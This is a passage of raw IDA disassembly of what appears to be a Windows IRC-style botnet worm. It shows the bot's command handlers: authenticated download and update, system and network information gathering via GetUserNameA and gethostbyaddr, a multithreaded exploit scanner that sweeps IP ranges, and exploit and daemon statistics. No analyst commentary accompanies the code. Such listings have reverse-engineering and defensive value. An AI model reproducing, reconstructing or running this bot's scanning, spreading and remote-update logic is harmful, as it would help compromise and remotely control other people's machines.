push offset aDlAuthFailure_ ; "DL: Auth Failure."
push dword ptr [ebp-4BCh]
jmp short loc_4019DB
; ---------------------------------------------------------------------------
loc_4019D5: ; CODE XREF: sub_40177B+2E�j
push offset aDlInvalidArgum ; "DL: Invalid Arguments"
push eax
loc_4019DB: ; CODE XREF: sub_40177B+258�j
push dword ptr [ebp+0Ch]
push offset dword_4269BC
call sub_417361
add esp, 10h
loc_4019EB: ; CODE XREF: sub_40177B+96�j
; sub_40177B+232�j ...
call sub_40467F
retn 1Ch
sub_40177B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4019F3 proc near ; DATA XREF: .rdata:off_420AEC�o
push 4B8h
mov eax, offset loc_41C313
call sub_404635
cmp dword ptr [ebp+1Ch], 3
mov eax, [ebp+10h]
mov edi, [ebp+20h]
mov [ebp-4C4h], eax
mov eax, [ebp+18h]
mov [ebp-4C0h], eax
mov [ebp-4BCh], edi
jl loc_401BFF
mov esi, 0BFh
xor ebx, ebx
push esi
lea eax, [ebp-18Fh]
push ebx
push eax
mov [ebp-190h], bl
call sub_407B70
push esi
lea eax, [ebp-0CFh]
push ebx
push eax
mov [ebp-0D0h], bl
call sub_407B70
push dword ptr [edi+4]
lea edi, [ebp-190h]
call sub_41B7F9
push 0C0h
lea esi, [ebp-0D0h]
mov ebx, offset aNbEdGzDdnbgNdZ ; "¡×¥¤Ð£§Ñ¤¤¡£Ð¤Ð§ÑÑ£¬¤Ó×ÖЬ ¢¢×¦ ÐЦ"...
call sub_4196D1
add esp, 20h
cmp byte ptr [ebp+8], 0
jz short loc_401A8F
cmp byte_425222, 0
jz loc_401C15
loc_401A8F: ; CODE XREF: sub_4019F3+8D�j
lea ecx, [ebp-0D0h]
lea eax, [ebp-190h]
loc_401A9B: ; CODE XREF: sub_4019F3+C0�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_401AB9
test dl, dl
jz short loc_401AB5
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_401AB9
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_401A9B
loc_401AB5: ; CODE XREF: sub_4019F3+B0�j
xor eax, eax
jmp short loc_401ABE
; ---------------------------------------------------------------------------
loc_401AB9: ; CODE XREF: sub_4019F3+AC�j
; sub_4019F3+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401ABE: ; CODE XREF: sub_4019F3+C4�j
test eax, eax
jnz loc_401BF2
push 327h
push eax
lea eax, [ebp-4B8h]
push eax
call sub_407B70
push dword ptr [ebp-4C0h]
mov esi, offset dword_420A78
push esi
mov edi, 0FFh
lea eax, [ebp-4B8h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-4B8h]
add esp, 1Ch
lea ecx, [eax+1]
loc_401B02: ; CODE XREF: sub_4019F3+114�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B02
push dword ptr [ebp-4C4h]
sub eax, ecx
push esi
mov [ebp+eax-4B8h], dl
lea eax, [ebp-3B8h]
push 22h
push eax
call sub_402AEE
lea eax, [ebp-3B8h]
add esp, 10h
lea ecx, [eax+1]
loc_401B33: ; CODE XREF: sub_4019F3+145�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B33
mov ebx, [ebp-4BCh]
push dword ptr [ebx+8]
sub eax, ecx
push esi
mov [ebp+eax-3B8h], dl
lea eax, [ebp-395h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-395h]
add esp, 10h
lea ecx, [eax+1]
loc_401B66: ; CODE XREF: sub_4019F3+178�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B66
push dword ptr [ebx+0Ch]
sub eax, ecx
push esi
mov [ebp+eax-395h], dl
lea eax, [ebp-295h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-295h]
add esp, 10h
lea ecx, [eax+1]
loc_401B93: ; CODE XREF: sub_4019F3+1A5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B93
sub eax, ecx
mov [ebp+eax-295h], dl
mov al, [ebp+8]
mov [ebp-192h], al
mov al, [ebp+0Ch]
push 8
mov [ebp-193h], al
mov byte ptr [ebp-195h], 1
mov byte ptr [ebp-194h], 1
call sub_40304B
pop ecx
mov [ebp-4BCh], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_401C15
push offset sub_41B925
lea ecx, [ebp-4B8h]
mov edi, offset dword_420A84
mov esi, eax
call sub_4140AB
jmp short loc_401C15
; ---------------------------------------------------------------------------
loc_401BF2: ; CODE XREF: sub_4019F3+CD�j
push offset aUpdAuthFailure ; "UPD: Auth Failure."
push dword ptr [ebp-4C0h]
jmp short loc_401C05
; ---------------------------------------------------------------------------
loc_401BFF: ; CODE XREF: sub_4019F3+2E�j
push offset aUpdInvalidArgu ; "UPD: Invalid Arguments."
push eax
loc_401C05: ; CODE XREF: sub_4019F3+20A�j
push dword ptr [ebp+0Ch]
push offset dword_4269BC
call sub_417361
add esp, 10h
loc_401C15: ; CODE XREF: sub_4019F3+96�j
; sub_4019F3+1E4�j ...
call sub_40467F
retn 1Ch
sub_4019F3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C1D proc near ; DATA XREF: .rdata:off_420B04�o
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 118h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_10]
push ebx
mov [ebp+var_118], eax
push esi
push edi
xor eax, eax
xor ecx, ecx
mov [ebp+var_14], cl
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
push 0FFh
stosb
push ecx
lea eax, [ebp+var_113]
push eax
mov [ebp+var_114], cl
call sub_407B70
push dword_4269BC
lea esi, [ebp+var_14]
call sub_418FC6
push 100h
lea esi, [ebp+var_114]
mov ebx, offset byte_425061
call sub_4196D1
mov eax, esi
push eax
push dword_426594
lea eax, [ebp+var_14]
push eax
push offset aHttpSDS ; "http://%s:%d/%s"
push [ebp+var_118]
push [ebp+arg_4]
push offset dword_4269BC
call sub_417361
mov ecx, [ebp+var_4]
add esp, 30h
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 1Ch
sub_401C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401CC0 proc near ; DATA XREF: .rdata:off_420BC4�o
var_444 = byte ptr -444h
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = byte ptr -438h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_418 = byte ptr -418h
var_417 = byte ptr -417h
var_408 = byte ptr -408h
var_407 = byte ptr -407h
var_308 = byte ptr -308h
var_307 = byte ptr -307h
var_208 = byte ptr -208h
var_207 = byte ptr -207h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 444h
mov eax, dword_423064
xor eax, esp
mov [esp+444h+var_4], eax
mov eax, [ebp+arg_10]
push ebx
push esi
push edi
mov esi, 0FFh
push esi
mov [esp+454h+var_43C], eax
xor ebx, ebx
lea eax, [esp+454h+var_107]
push ebx
push eax
mov [esp+45Ch+var_108], 0
call sub_407B70
add esp, 0Ch
push esi
lea eax, [esp+454h+var_307]
push ebx
push eax
mov [esp+45Ch+var_308], bl
call sub_407B70
xor eax, eax
mov [esp+45Ch+var_418], bl
lea edi, [esp+45Ch+var_417]
stosd
stosd
stosd
stosw
add esp, 0Ch
push esi
stosb
lea eax, [esp+454h+var_407]
push ebx
push eax
mov [esp+45Ch+var_408], bl
call sub_407B70
add esp, 0Ch
push esi
lea eax, [esp+454h+var_207]
push ebx
push eax
mov [esp+45Ch+var_208], bl
call sub_407B70
add esp, 0Ch
push 8
pop ecx
xor eax, eax
lea edi, [esp+450h+var_438]
rep stosd
lea eax, [esp+450h+var_438]
mov ebx, 100h
push eax
mov [esp+454h+var_440], ebx
call ds:dword_41D098 ; GlobalMemoryStatus
mov edi, [esp+450h+var_430]
mov ecx, [esp+450h+var_42C]
shr edi, 14h
shr ecx, 14h
mov eax, edi
sub eax, ecx
push 1
mov ecx, ebx
lea esi, [esp+454h+var_108]
mov dword ptr [esp+454h+var_444], eax
call sub_418E51
pop ecx
call sub_41A391
push 1
push ebx
lea esi, [esp+458h+var_308]
call sub_418E1F
push dword_4269BC
lea esi, [esp+45Ch+var_418]
call sub_418FC6
add esp, 0Ch
lea eax, [esp+450h+var_440]
push eax
lea eax, [esp+454h+var_408]
push eax
call ds:dword_41D048 ; GetUserNameA
push ebx
lea eax, [esp+454h+var_208]
push eax
call ds:dword_41D0F4 ; GetSystemDirectoryA
call sub_418DA0
push dword_4265AC
lea eax, [esp+454h+var_208]
push dword_4265A8
push dword_4265A4
push dword_4265A0
push dword_42659C
push dword_426598
push eax
lea eax, [esp+46Ch+var_408]
push eax
mov eax, esi
push eax
lea eax, [esp+474h+var_308]
push eax
push edi
push dword ptr [esp+47Ch+var_444]
mov esi, offset byte_426AE8
push dword_426BE8
lea eax, [esp+484h+var_108]
push esi
push dword_426BEC
push eax
push offset aSystemSCpuIXS@ ; "System: %s [CPU: %i x %s @ %dMhz] [RAM:"...
push [esp+494h+var_43C]
push [ebp+arg_4]
push offset dword_4269BC
call sub_417361
push 108h
push 0
push esi
call sub_407B70
mov ecx, [esp+4ACh+var_4]
add esp, 5Ch
pop edi
pop esi
pop ebx
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn 1Ch
sub_401CC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E82 proc near ; DATA XREF: .rdata:off_420BCC�o
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_10]
push esi
push edi
push dword_4269BC
mov [ebp+var_14], 0
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
lea esi, [ebp+var_14]
stosb
call sub_418FC6
pop ecx
mov eax, esi
push eax
call ds:dword_41D264 ; inet_addr
push 2
mov [ebp+var_18], eax
push 4
lea eax, [ebp+var_18]
push eax
call ds:dword_41D280 ; gethostbyaddr
test eax, eax
jnz short loc_401EEF
mov eax, esi
push eax
push offset aNetIpSHostNA ; "Net: IP: %s Host: N/A"
push ebx
push [ebp+arg_4]
push offset dword_4269BC
call sub_417361
add esp, 14h
jmp short loc_401F0B
; ---------------------------------------------------------------------------
loc_401EEF: ; CODE XREF: sub_401E82+50�j
push dword ptr [eax]
lea eax, [ebp+var_14]
push eax
push offset aNetIpSHostS ; "Net: IP: %s Host: %s"
push ebx
push [ebp+arg_4]
push offset dword_4269BC
call sub_417361
add esp, 18h
loc_401F0B: ; CODE XREF: sub_401E82+6B�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 1Ch
sub_401E82 endp
; =============== S U B R O U T I N E =======================================
sub_401F1C proc near ; DATA XREF: .rdata:off_420D1C�o
push 60h
mov eax, offset loc_41C2E1
call sub_404635
mov eax, [ebp+18h]
mov [ebp-68h], eax
xor eax, eax
mov byte ptr [ebp-30h], 0
lea edi, [ebp-2Fh]
stosd
stosd
stosd
mov ebx, [ebp+20h]
stosw
and dword ptr [ebp-58h], 0
and dword ptr [ebp-48h], 0
stosb
xor eax, eax
mov byte ptr [ebp-20h], 0
lea edi, [ebp-1Fh]
stosd
stosd
stosd
stosw
stosb
or edi, 0FFFFFFFFh
cmp byte_433945, 0
mov [ebp-50h], ebx
mov byte ptr [ebp-41h], 0
mov [ebp-5Ch], edi
mov [ebp-60h], edi
mov [ebp-64h], edi
mov [ebp-6Ch], edi
jnz short loc_401F83
call sub_41B775
test al, al
jz loc_402432
loc_401F83: ; CODE XREF: sub_401F1C+58�j
cmp byte_4268B4, 0
jnz short loc_401F99
call sub_418D17
test al, al
jz loc_402432
loc_401F99: ; CODE XREF: sub_401F1C+6E�j
and dword ptr [ebp-54h], 0
mov ecx, offset dword_424528
mov eax, ecx
lea esi, [eax+1]
loc_401FA7: ; CODE XREF: sub_401F1C+90�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401FA7
jmp short loc_401FF6
; ---------------------------------------------------------------------------
loc_401FB0: ; CODE XREF: sub_401F1C+DC�j
mov edx, [ebx+4]
mov eax, ecx
loc_401FB5: ; CODE XREF: sub_401F1C+B1�j
mov cl, [eax]
cmp cl, [edx]
jnz short loc_401FD3
test cl, cl
jz short loc_401FCF
mov cl, [eax+1]
cmp cl, [edx+1]
jnz short loc_401FD3
inc eax
inc eax
inc edx
inc edx
test cl, cl
jnz short loc_401FB5
loc_401FCF: ; CODE XREF: sub_401F1C+A1�j
xor eax, eax
jmp short loc_401FD7
; ---------------------------------------------------------------------------
loc_401FD3: ; CODE XREF: sub_401F1C+9D�j
; sub_401F1C+A9�j
sbb eax, eax
sbb eax, edi
loc_401FD7: ; CODE XREF: sub_401F1C+B5�j
test eax, eax
jz short loc_401FFC
inc dword ptr [ebp-54h]
mov ecx, [ebp-54h]
imul ecx, 2Ch
lea ecx, dword_424528[ecx]
mov eax, ecx
lea esi, [eax+1]
loc_401FEF: ; CODE XREF: sub_401F1C+D8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401FEF
loc_401FF6: ; CODE XREF: sub_401F1C+92�j
sub eax, esi
jnz short loc_401FB0
jmp short loc_402001
; ---------------------------------------------------------------------------
loc_401FFC: ; CODE XREF: sub_401F1C+BD�j
cmp [ebp-54h], edi
jnz short loc_40201E
loc_402001: ; CODE XREF: sub_401F1C+DE�j
push offset aScanUnknownExp ; "Scan: Unknown Exploit."
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push offset dword_4269BC
call sub_417361
add esp, 10h
jmp loc_402432
; ---------------------------------------------------------------------------
loc_40201E: ; CODE XREF: sub_401F1C+E3�j
mov esi, [ebx+8]
mov eax, esi
mov ecx, offset a____0 ; "*.*.*.*"
call sub_419044
test eax, eax
jz short loc_402043
push dword ptr [ebx+0Ch]
mov byte ptr [ebp-41h], 1
call sub_403ECE
pop ecx
mov [ebp-4Ch], eax
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_402043: ; CODE XREF: sub_401F1C+113�j
push esi
call sub_403ECE
pop ecx
push 3
pop edx
cmp [ebp+1Ch], edx
mov [ebp-4Ch], eax
mov [ebp-48h], edx
jl short loc_402099
mov eax, edx
loc_40205A: ; CODE XREF: sub_401F1C+17B�j
mov ecx, [ebp-50h]
mov eax, [ecx+eax*4]
mov edi, eax
mov esi, offset aA ; "-a"
mov ecx, edx
xor ebx, ebx
repe cmpsb
jz short loc_4020E7
mov edi, eax
mov esi, offset aB ; "-b"
mov ecx, edx
xor ebx, ebx
repe cmpsb
jz short loc_402099
mov edi, eax
mov esi, offset aC ; "-c"
mov ecx, edx
xor eax, eax
repe cmpsb
jz short loc_4020ED
inc dword ptr [ebp-48h]
movzx eax, word ptr [ebp-48h]
cmp eax, [ebp+1Ch]
jle short loc_40205A
loc_402099: ; CODE XREF: sub_401F1C+13A�j
; sub_401F1C+160�j
mov dword ptr [ebp-48h], 1
loc_4020A0: ; CODE XREF: sub_401F1C+125�j
; sub_401F1C+1CF�j ...
xor eax, eax
loc_4020A2: ; CODE XREF: sub_401F1C+19C�j
cmp byte_426D01[eax], 0
jz short loc_4020AE
inc dword ptr [ebp-58h]
loc_4020AE: ; CODE XREF: sub_401F1C+18D�j
add eax, 124h
cmp eax, 0CD50h
jbe short loc_4020A2
mov ecx, [ebp-58h]
mov eax, 0B4h
sub eax, ecx
cmp eax, [ebp-4Ch]
jnb short loc_4020F6
push eax
push offset aScanNotEnoughT ; "Scan: Not Enough Threads. %d Available."...
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push offset dword_4269BC
call sub_417361
add esp, 14h
jmp loc_402432
; ---------------------------------------------------------------------------
loc_4020E7: ; CODE XREF: sub_401F1C+151�j
and dword ptr [ebp-48h], 0
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_4020ED: ; CODE XREF: sub_401F1C+16F�j
mov dword ptr [ebp-48h], 2
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_4020F6: ; CODE XREF: sub_401F1C+1AB�j
add [ebp-4Ch], ecx
cmp byte ptr [ebp-41h], 0
jz loc_40221D
mov eax, [ebp-50h]
push dword ptr [eax+8]
lea eax, [ebp-30h]
push offset dword_420A78
push 0Fh
pop ebx
push ebx
push eax
call sub_402AEE
lea eax, [ebp-30h]
add esp, 10h
lea ecx, [eax+1]
loc_402124: ; CODE XREF: sub_401F1C+20D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402124
sub eax, ecx
mov [ebp+eax-30h], dl
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-64h]
push eax
lea eax, [ebp-60h]
push eax
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-30h]
push offset aD_D_D_D_1 ; "%d.%d.%d.%d"
push eax
call sub_4035E4
add esp, 18h
cmp dword ptr [ebp-5Ch], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_40216C
push offset aX_ ; "x."
push ebx
push eax
call sub_402AEE
add esp, 0Ch
jmp short loc_40217E
; ---------------------------------------------------------------------------
loc_40216C: ; CODE XREF: sub_401F1C+23D�j
push dword ptr [ebp-5Ch]
push offset aD_ ; "%d."
push ebx
push eax
call sub_402AEE
add esp, 10h
loc_40217E: ; CODE XREF: sub_401F1C+24E�j
cmp dword ptr [ebp-60h], 0FFFFFFFFh
mov esi, offset aSD_ ; "%s%d."
mov edi, offset aSx_ ; "%sx."
lea eax, [ebp-20h]
jnz short loc_40219F
push eax
push edi
push ebx
push eax
call sub_402AEE
add esp, 10h
jmp short loc_4021B1
; ---------------------------------------------------------------------------
loc_40219F: ; CODE XREF: sub_401F1C+273�j
push dword ptr [ebp-60h]
push eax
push esi
lea eax, [ebp-20h]
push ebx
push eax
call sub_402AEE
add esp, 14h
loc_4021B1: ; CODE XREF: sub_401F1C+281�j
cmp dword ptr [ebp-64h], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_4021C8
push eax
push edi
push ebx
push eax
call sub_402AEE
add esp, 10h
jmp short loc_4021DA
; ---------------------------------------------------------------------------
loc_4021C8: ; CODE XREF: sub_401F1C+29C�j
push dword ptr [ebp-64h]
push eax
push esi
lea eax, [ebp-20h]
push ebx
push eax
call sub_402AEE
add esp, 14h
loc_4021DA: ; CODE XREF: sub_401F1C+2AA�j
cmp dword ptr [ebp-6Ch], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_4021F5
push eax
push offset aSx ; "%sx"
push ebx
push eax
call sub_402AEE
add esp, 10h
jmp short loc_40220B
; ---------------------------------------------------------------------------
loc_4021F5: ; CODE XREF: sub_401F1C+2C5�j
push dword ptr [ebp-6Ch]
push eax
push offset aSD ; "%s%d"
lea eax, [ebp-20h]
push ebx
push eax
call sub_402AEE
add esp, 14h
loc_40220B: ; CODE XREF: sub_401F1C+2D7�j
lea eax, [ebp-20h]
lea edx, [eax+1]
loc_402211: ; CODE XREF: sub_401F1C+2FA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402211
jmp loc_4022F6
; ---------------------------------------------------------------------------
loc_40221D: ; CODE XREF: sub_401F1C+1E1�j
push dword_4269BC
mov byte ptr [ebp-40h], 0
xor eax, eax
lea edi, [ebp-3Fh]
stosd
stosd
stosd
stosw
lea esi, [ebp-40h]
stosb
call sub_418FC6
xor eax, eax
lea edi, [ebp-30h]
stosd
stosd
stosd
stosd
mov eax, esi
push eax
push offset dword_420A78
push 0Fh
pop esi
lea eax, [ebp-30h]
push esi
push eax
call sub_402AEE
lea eax, [ebp-30h]
add esp, 14h
lea ecx, [eax+1]
loc_402261: ; CODE XREF: sub_401F1C+34A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402261
sub eax, ecx
mov [ebp+eax-30h], dl
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-64h]
push eax
lea eax, [ebp-60h]
push eax
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-30h]
push offset aD_D_D_D_1 ; "%d.%d.%d.%d"
push eax
call sub_4035E4
mov eax, [ebp-48h]
add esp, 18h
sub eax, 0
jz short loc_4022D4
dec eax
jz short loc_4022BA
dec eax
jnz short loc_4022E9
push dword ptr [ebp-64h]
lea eax, [ebp-20h]
push dword ptr [ebp-60h]
push dword ptr [ebp-5Ch]
push offset aD_D_D_x ; "%d.%d.%d.x"
push esi
push eax
call sub_402AEE
add esp, 18h
jmp short loc_4022E9
; ---------------------------------------------------------------------------
loc_4022BA: ; CODE XREF: sub_401F1C+37C�j
push dword ptr [ebp-60h]
lea eax, [ebp-20h]
push dword ptr [ebp-5Ch]
push offset aD_D_x_x ; "%d.%d.x.x"
push esi
push eax
call sub_402AEE
add esp, 14h
jmp short loc_4022E9
; ---------------------------------------------------------------------------
loc_4022D4: ; CODE XREF: sub_401F1C+379�j
push dword ptr [ebp-5Ch]
lea eax, [ebp-20h]
push offset aD_x_x_x ; "%d.x.x.x"
push esi
push eax
call sub_402AEE
add esp, 10h
loc_4022E9: ; CODE XREF: sub_401F1C+37F�j
; sub_401F1C+39C�j ...
lea eax, [ebp-20h]
lea edx, [eax+1]
loc_4022EF: ; CODE XREF: sub_401F1C+3D8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4022EF
loc_4022F6: ; CODE XREF: sub_401F1C+2FC�j
sub eax, edx
cmp byte ptr [ebp-41h], 0
mov byte ptr [ebp+eax-20h], 0
mov eax, [ebp-50h]
jz short loc_40230B
push dword ptr [eax+0Ch]
jmp short loc_40230E
; ---------------------------------------------------------------------------
loc_40230B: ; CODE XREF: sub_401F1C+3E8�j
push dword ptr [eax+8]
loc_40230E: ; CODE XREF: sub_401F1C+3ED�j
call sub_403ECE
push eax
mov eax, [ebp-54h]
imul eax, 2Ch
push dword_424548[eax]
lea eax, [ebp-20h]
push eax
push offset aScanSDUsingDTh ; "Scan: %s:%d Using %d Threads."
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push offset dword_4269BC
call sub_417361
add esp, 20h
call sub_4192FB
mov ecx, [ebp-4Ch]
cmp [ebp-58h], ecx
jnb loc_402432
mov eax, [ebp-58h]
imul eax, 124h
sub ecx, [ebp-58h]
mov [ebp-50h], eax
mov [ebp-4Ch], ecx
mov esi, eax
loc_402361: ; CODE XREF: sub_401F1C+510�j
push 124h
lea ebx, dword_426CF0[esi]
lea edi, [ebx-100h]
push 0
push edi
call sub_407B70
lea eax, [ebp-30h]
push eax
push offset dword_420A78
push 0Fh
push ebx
call sub_402AEE
mov eax, ebx
add esp, 1Ch
lea ecx, [eax+1]
loc_402393: ; CODE XREF: sub_401F1C+47C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402393
push dword ptr [ebp-68h]
sub eax, ecx
mov byte ptr dword_426CF0[esi+eax], dl
mov al, [ebp-41h]
push offset dword_420A78
mov [ebx+12h], al
mov eax, [ebp-48h]
push 0FFh
push edi
mov [ebx+18h], eax
call sub_402AEE
mov eax, edi
add esp, 10h
lea ecx, [eax+1]
loc_4023CA: ; CODE XREF: sub_401F1C+4B3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4023CA
sub eax, ecx
mov byte_426BF0[esi+eax], dl
mov al, [ebp+0Ch]
mov [ebx+10h], al
mov eax, [ebp-54h]
push 8
mov byte ptr [ebx+11h], 1
mov [ebx+14h], eax
call sub_40304B
pop ecx
mov [ebp-58h], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_402415
mov ecx, edi
push offset sub_413A2D
mov edi, offset aScanner ; "Scanner"
mov esi, eax
call sub_4140AB
mov esi, [ebp-50h]
jmp short loc_402417
; ---------------------------------------------------------------------------
loc_402415: ; CODE XREF: sub_401F1C+4DF�j
xor eax, eax
loc_402417: ; CODE XREF: sub_401F1C+4F7�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [eax]
add esi, 124h
dec dword ptr [ebp-4Ch]
mov [ebx+20h], eax
mov [ebp-50h], esi
jnz loc_402361
loc_402432: ; CODE XREF: sub_401F1C+61�j
; sub_401F1C+77�j ...
call sub_40467F
retn 1Ch
sub_401F1C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40243A proc near ; DATA XREF: .rdata:off_420D24�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
and [esp+1Ch+var_1C], 0
push ebx
push esi
mov ebx, offset dword_433C48
push edi
mov [esp+28h+var_10], ebx
loc_402453: ; CODE XREF: sub_40243A+83�j
; sub_40243A+A0�j ...
mov eax, dword_433C4C
mov eax, [eax]
mov [esp+28h+var_14], eax
mov [esp+28h+var_18], ebx
loc_402462: ; CODE XREF: sub_40243A+67�j
mov eax, dword_433C4C
lea edi, [esp+28h+var_10]
lea esi, [esp+28h+var_18]
mov [esp+28h+var_C], eax
call sub_40166F
test al, al
jz short loc_4024F5
mov edi, offset aScanner ; "Scanner"
call sub_40164F
mov esi, eax
add esi, 5
push 8
pop ecx
xor eax, eax
repe cmpsb
lea esi, [esp+28h+var_18]
jz short loc_4024A3
lea edi, [esp+28h+var_8]
call sub_40168C
jmp short loc_402462
; ---------------------------------------------------------------------------
loc_4024A3: ; CODE XREF: sub_40243A+5C�j
call sub_40164F
mov edi, [eax+40h]
lea esi, [esp+28h+var_18]
call sub_40164F
mov eax, [eax]
call sub_414023
test al, al
jz short loc_402453
xor eax, eax
xor ecx, ecx
loc_4024C3: ; CODE XREF: sub_40243A+9E�j
cmp dword_426D10[ecx], edi
jz short loc_4024DF
add ecx, 124h
inc eax
cmp ecx, 0CD50h
jbe short loc_4024C3
jmp loc_402453
; ---------------------------------------------------------------------------
loc_4024DF: ; CODE XREF: sub_40243A+8F�j
inc [esp+28h+var_1C]
imul eax, 124h
mov byte_426D01[eax], 0
jmp loc_402453
; ---------------------------------------------------------------------------
loc_4024F5: ; CODE XREF: sub_40243A+40�j
push [esp+28h+var_1C]
push offset aScanAllScanThr ; "Scan: All Scan Threads Stopped. %d kill"...
push [ebp+arg_10]
push [ebp+arg_4]
push offset dword_4269BC
call sub_417361
add esp, 14h
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 1Ch
sub_40243A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=188h
sub_40251A proc near ; DATA XREF: .rdata:off_420D2C�o
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-188h]
sub esp, 208h
mov eax, dword_423064
xor eax, ebp
mov [ebp+188h+var_4], eax
mov eax, [ebp+188h+arg_10]
push esi
push edi
mov esi, 1FFh
push esi
mov [ebp+188h+var_208], eax
lea eax, [ebp+188h+var_203]
push 0
push eax
mov [ebp+188h+var_204], 0
call sub_407B70
push offset aStatisticsExpl ; "Statistics: Exploits:"
lea eax, [ebp+188h+var_204]
push esi
push eax
xor edi, edi
call sub_402AEE
add esp, 18h
xor eax, eax
loc_40256B: ; CODE XREF: sub_40251A+7E�j
push dword_42454C[eax]
lea eax, dword_424528[eax]
push eax
lea eax, [ebp+188h+var_204]
push eax
push offset aSSD ; "%s %s: %d"
push esi
push eax
call sub_402AEE
add esp, 18h
inc edi
mov eax, edi
imul eax, 2Ch
cmp dword_424548[eax], 0
jnz short loc_40256B
lea eax, [ebp+188h+var_204]
push eax
push offset aSDaemons ; "%s; Daemons:"
push esi
push eax
call sub_402AEE
push dword_43394C
lea eax, [ebp+188h+var_204]
push eax
push offset aSTftpD ; "%s TFTP: %d"
push esi
push eax
call sub_402AEE
push dword_433940
lea eax, [ebp+188h+var_204]
push eax
push offset aSHttpD ; "%s HTTP: %d"
push esi
push eax
call sub_402AEE
add esp, 38h
lea eax, [ebp+188h+var_204]
pop edi
lea edx, [eax+1]
pop esi
loc_4025E1: ; CODE XREF: sub_40251A+CC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4025E1
sub eax, edx
mov [ebp+eax+188h+var_204], cl
lea eax, [ebp+188h+var_204]
push eax
push offset dword_420A78
push [ebp+188h+var_208]
push [ebp+188h+arg_4]
push offset dword_4269BC
call sub_417361
mov ecx, [ebp+188h+var_4]
xor ecx, ebp
add esp, 14h
call sub_402710
add ebp, 188h
leave
retn 1Ch
sub_40251A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402624 proc near ; CODE XREF: sub_41B1A0+A6�p
jmp ds:dword_41D1DC
sub_402624 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40262A proc near ; CODE XREF: sub_41B1A0+149�p
jmp ds:dword_41D1D8
sub_40262A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402630 proc near ; CODE XREF: sub_41B1A0+76�p
; sub_41B1A0+B9�p ...
jmp ds:dword_41D1D4
